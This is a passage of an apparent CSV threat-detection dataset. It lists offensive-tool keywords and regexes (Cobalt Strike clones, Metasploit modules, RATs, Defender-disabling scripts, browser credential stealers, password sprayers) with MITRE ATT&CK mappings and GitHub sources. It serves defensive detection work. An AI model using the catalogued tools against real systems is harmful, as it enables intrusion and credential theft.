- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*pkexec64.tar.gz*",".{0,1000}pkexec64\.tar\.gz.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*PKINITtools.git*",".{0,1000}PKINITtools\.git.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*pkt_comm/word_gen.*",".{0,1000}pkt_comm\/word_gen\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pkt_comm/word_list*",".{0,1000}pkt_comm\/word_list.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*plackyhacker/CmdLineSpoofer*",".{0,1000}plackyhacker\/CmdLineSpoofer.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*Plazmaz/LNKUp*",".{0,1000}Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf file is clean*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf\sfile\sis\sclean.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please Dont upload sample anywhere*Its been fifth time i am again making this script fud*",".{0,1000}Please\sDont\supload\ssample\sanywhere.{0,1000}Its\sbeen\sfifth\stime\si\sam\sagain\smaking\sthis\sscript\sfud.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Please select command [PASSWORDS/HISTORY/COOKIES/AUTOFILL/CREDIT_CARDS/BOOKMARKS]*",".{0,1000}Please\sselect\scommand\s\[PASSWORDS\/HISTORY\/COOKIES\/AUTOFILL\/CREDIT_CARDS\/BOOKMARKS\].{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*'Please Turn off your Windows Defender'*",".{0,1000}\'Please\sTurn\soff\syour\sWindows\sDefender\'.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Please use the -Password option to specify a unique password to spray*",".{0,1000}Please\suse\sthe\s\-Password\soption\sto\sspecify\sa\sunique\spassword\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Please use the -User option to specify a unique username to spray*",".{0,1000}Please\suse\sthe\s\-User\soption\sto\sspecify\sa\sunique\susername\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*plex_unpickle_dict_rce.*",".{0,1000}plex_unpickle_dict_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*plug_getpass_nps.dll*",".{0,1000}plug_getpass_nps\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_katz_nps.exe*",".{0,1000}plug_katz_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_qvte_nps.exe*",".{0,1000}plug_qvte_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plugins.nessus.org.*",".{0,1000}plugins\.nessus\.org\..{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*plugins/nemesis.rb*",".{0,1000}plugins\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Plugins\AccessTokens\TokenDriver*",".{0,1000}Plugins\\AccessTokens\\TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Plugins\AccessTokens\TokenManipulation*",".{0,1000}Plugins\\AccessTokens\\TokenManipulation.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Plugins\Execution\PSExec*",".{0,1000}Plugins\\Execution\\PSExec.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*plugins\ScreenControl.dll*",".{0,1000}plugins\\ScreenControl\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Plugins\SendFile.dll*",".{0,1000}Plugins\\SendFile\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Plugins\SendMemory.dll*",".{0,1000}Plugins\\SendMemory\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*plummm/CVE-2022-27666*",".{0,1000}plummm\/CVE\-2022\-27666.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*pm3 -p /dev/ttyACM0*",".{0,1000}pm3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PME\LSA\*-LSA.txt*",".{0,1000}PME\\LSA\\.{0,1000}\-LSA\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PME\UserFiles\*-UserFiles.txt*",".{0,1000}PME\\UserFiles\\.{0,1000}\-UserFiles\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PoC To enumerate logged on users on a remote system using the winreg named pipe*",".{0,1000}PoC\sTo\senumerate\slogged\son\susers\son\sa\sremote\ssystem\susing\sthe\swinreg\snamed\spipe.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","8","8","N/A","N/A","N/A","N/A" "*poc.bash*",".{0,1000}poc\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bat*",".{0,1000}poc\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bin*",".{0,1000}poc\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.exe*",".{0,1000}poc\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.exe*poc.txt*",".{0,1000}poc\.exe.{0,1000}poc\.txt.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*poc.msi*",".{0,1000}poc\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.pl*",".{0,1000}poc\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.ps1*",".{0,1000}poc\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.reg*",".{0,1000}poc\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.run*",".{0,1000}poc\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.sh*",".{0,1000}poc\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vb*",".{0,1000}poc\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbe*",".{0,1000}poc\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbs*",".{0,1000}poc\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbscript*",".{0,1000}poc\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.zsh*",".{0,1000}poc\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*POC_CloudFilter_ArbitraryFile_EoP*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POC_CloudFilter_ArbitraryFile_EoP.*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POC1*implant.cpp*",".{0,1000}POC1.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*POC2*implant.cpp*",".{0,1000}POC2.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*pocs_go/*/CVE-*.go*",".{0,1000}pocs_go\/.{0,1000}\/CVE\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*podman run * --name avred -d avred*",".{0,1000}podman\srun\s.{0,1000}\s\-\-name\savred\s\-d\savred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense 